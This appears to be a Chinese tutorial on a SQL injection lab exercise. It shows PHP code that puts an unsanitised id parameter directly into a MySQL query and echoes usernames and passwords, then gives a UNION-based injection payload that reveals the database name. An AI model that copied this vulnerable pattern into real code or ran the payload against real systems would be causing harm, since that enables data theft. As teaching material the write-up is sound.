<?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); // take the variables if(isset($_GET['id'])) { $id=$_GET['id']; //logging the connection parameters to a file for analysis. $fp=fopen('result.txt','a'); fwrite($fp,'ID:'.$id."\n"); fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
if($row) { echo"<font size='5' color= '#99FF00'>"; echo'Your Login name:'. $row['username']; echo"<br>"; echo'Your Password:' .$row['password']; echo"</font>"; } else { echo'<font color= "#FFFF00">'; print_r(mysql_error()); echo"</font>"; } } else { echo"Please input the ID as parameter with numeric value";}
?>
主要漏洞点就是:
1 2 3
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result);
这里把用户输入的东西直接插入要执行的sql语句,导致我们可以控制sql语句 如果我们输入:
1 2 3 4 5
$id = ' union select 1,database(),3 --+ #实际执行sql语句 ===> SELECT * FROM users WHERE id='' union select 1,database(),3 --+' LIMIT 0,1